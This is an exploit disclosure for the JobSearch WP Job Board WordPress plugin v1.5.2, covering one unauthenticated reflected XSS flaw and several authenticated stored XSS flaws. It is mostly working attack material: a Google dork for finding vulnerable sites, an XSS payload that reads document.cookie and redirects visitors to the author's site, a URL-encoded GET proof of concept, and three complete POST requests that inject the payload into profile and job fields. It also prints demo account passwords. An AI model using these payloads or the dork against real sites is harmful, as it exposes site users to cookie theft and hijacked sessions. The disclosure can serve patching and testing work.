[+] Exploit Title: JobSearch WP Job Board WordPress Plugin v1.5.2 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/plugins/wp-jobsearch/
[+] Date: 2020-07-05
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 1.5.2
[+] Software Link: https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected & Multiple Authenticated Persistent XSS vulnerabilities was discovered in the JobSearch plugin v1.5.2 for WordPress.

[i] An Authenticated Persistent XSS @ Job Page will trigger on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.

[i] Demo account #1 (Candidate): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Demo account #2 (Employer): vladvector2 / DJKNFU#$&H#IUFD (login / password)

[i] Candidate Profile URL: https://eyecix.com/plugins/jobsearch/candidate/vladvector/

[i] Employer Profile URL: https://eyecix.com/plugins/jobsearch/employer/vladvector/

[i] Employer Job URL: https://eyecix.com/plugins/jobsearch/job/poc/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?sector_cat=[payload]

[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable field: Dial Code)

[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Dial Code, Full Address)

[x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Offered Salary, Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address)



### [ Payload: ]

[$] "--><!--<img src="--><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://eyecix.com/plugins/jobsearch/?sector_cat=%22--%3E%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E1%22--%3E

[!] GET /plugins/jobsearch/?sector_cat=%22--%3E%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E1%22--%3E HTTP/1.1
Host: eyecix.com



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------37355866649416730132656525480
Content-Length: 4733
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_phone"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_sector"

10
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_bio"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="academic-level"

masters-degree
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="Age"

23-27-years
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="salary"

31337
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="gender"

male
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="industry"

html-department
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_address"


-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------37355866649416730132656525480
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------37355866649416730132656525480--



### [ PoC Authenticated Persistent XSS -> Employer User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------3410078824874134106483353426
Content-Length: 4050
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="display_name"

1337
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_phone"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_website"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_sector"

10
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_dob_mm"

7
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_dob_dd"

5
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_dob_yy"

2020
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_bio"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="founded-since"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------3410078824874134106483353426
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------3410078824874134106483353426--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=user-job HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------14887782671057058922257617694
Content-Length: 4157
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=user-job
Cookie: [cookies_here]

-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_detail"

PoC
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="application_deadline"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_sector"

10
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_type"

4
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="get_job_skills[]"

CSS
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_apply_url"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_apply_email"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_max_salary"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="offered-salary"

19000
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="career-level"

executive
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="experience"

4-years
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="gender"

male
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="Industry"

graphics-designing
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="qualifications"

masters-degree
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

16
-----------------------------14887782671057058922257617694
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------14887782671057058922257617694--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector